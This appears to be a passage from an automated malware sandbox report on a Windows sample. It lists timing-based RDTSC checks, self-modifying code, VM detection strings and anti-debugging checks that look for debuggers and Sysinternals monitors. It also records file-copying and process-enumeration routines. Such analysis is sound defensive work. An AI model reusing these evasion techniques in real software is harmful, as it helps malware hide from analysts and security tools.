                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1376ADA second address: 1376AE4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC400D80DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13765D3 second address: 13765E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504820h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13765E9 second address: 13765ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13765ED second address: 13765F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13765F1 second address: 137660A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC400D80DADh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137EB20 second address: 137EB43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504829h 0x00000007 jg 00007FC40050481Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1383BCF second address: 1383BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1383BD5 second address: 1383BE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jc 00007FC400504835h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1383BE6 second address: 1383C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DB9h 0x00000009 pushad 0x0000000a jo 00007FC400D80DA6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1383C0E second address: 1383C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388653 second address: 138865B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138865B second address: 138865F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138865F second address: 1388663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388663 second address: 1388669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388669 second address: 138866E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138866E second address: 1388674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1388674 second address: 13886A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DAAh 0x00000009 popad 0x0000000a jo 00007FC400D80DA8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FC400D80DA8h 0x0000001c js 00007FC400D80DAAh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13884F7 second address: 13884FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13884FB second address: 1388512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC400D80DB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FEDA second address: 138FEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FC400504816h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FEE7 second address: 138FF03 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC400D80DA6h 0x00000008 jmp 00007FC400D80DB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FF03 second address: 138FF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC400504816h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FF0F second address: 138FF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FF13 second address: 138FF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC400504827h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FF37 second address: 138FF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138EA47 second address: 138EA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138EA4D second address: 138EA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jne 00007FC400D80DA6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e jns 00007FC400D80DB7h 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007FC400D80DA6h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138EA7E second address: 138EA8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138EA8B second address: 138EA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F15C second address: 138F179 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC40050481Fh 0x00000008 je 00007FC400504816h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F179 second address: 138F19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC400D80DB7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F19C second address: 138F1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FBFD second address: 138FC0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007FC400D80DA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FC0F second address: 138FC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393DCA second address: 1393DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FC400D80DAFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393DE1 second address: 1393DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393F45 second address: 1393F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FC400D80DADh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393F5D second address: 1393F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393F65 second address: 1393F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393F6A second address: 1393F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC400504816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1393F76 second address: 1393F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F7F second address: 1393F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1393F83 second address: 1393F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A21FC second address: 13A221A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC40050481Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A221A second address: 13A221E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF368 second address: 13AF390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FC400504829h 0x0000000b popad 0x0000000c push eax 0x0000000d jnc 00007FC400504816h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BECE8 second address: 13BECF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF267 second address: 13BF284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC400504823h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF284 second address: 13BF2A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB5h 0x00000007 je 00007FC400D80DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF2A3 second address: 13BF2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF589 second address: 13BF58F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF58F second address: 13BF593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF593 second address: 13BF5AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC400D80DA8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FC400D80DA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5AD second address: 13BF5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5B1 second address: 13BF5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5B9 second address: 13BF5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5BF second address: 13BF5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5C3 second address: 13BF5D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF5D1 second address: 13BF5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF84D second address: 13BF86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FC400504824h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3C29 second address: 13C3C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC400D80DB7h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007FC400D80DB5h 0x00000017 popad 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edi 0x0000001e jmp 00007FC400D80DB7h 0x00000023 pop edi 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jo 00007FC400D80DACh 0x0000002e je 00007FC400D80DA6h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3C91 second address: 13C3C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC400504816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0499 second address: 50D049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D049D second address: 50D04A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D055F second address: 50D0563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0563 second address: 50D0569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0569 second address: 50D05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 93h 0x0000000d jmp 00007FC400D80DB3h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop esi 0x0000001a mov esi, edi 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D05A3 second address: 50D05C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, di 0x00000010 push edx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EDCB5 second address: 12EDCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 112DA1D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12E277C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12E9A11 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132F2D7 rdtsc 0_2_0132F2D7
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39055
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E540F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E540F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E4E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E547C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E547C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E41710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E54B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E53B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E4EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41160 GetSystemInfo,ExitProcess,0_2_00E41160
                Source: file.exe, file.exe, 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2094837133.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094837133.00000000009F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37868
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37890
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37871
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37882
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37756
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37922
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132F2D7 rdtsc 0_2_0132F2D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E44610 VirtualProtect ?,00000004,00000100,00000000 0_2_00E44610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E59BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59AA0 mov eax, dword ptr fs:[00000030h] 0_2_00E59AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E57690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00E57690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5248, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00E59790
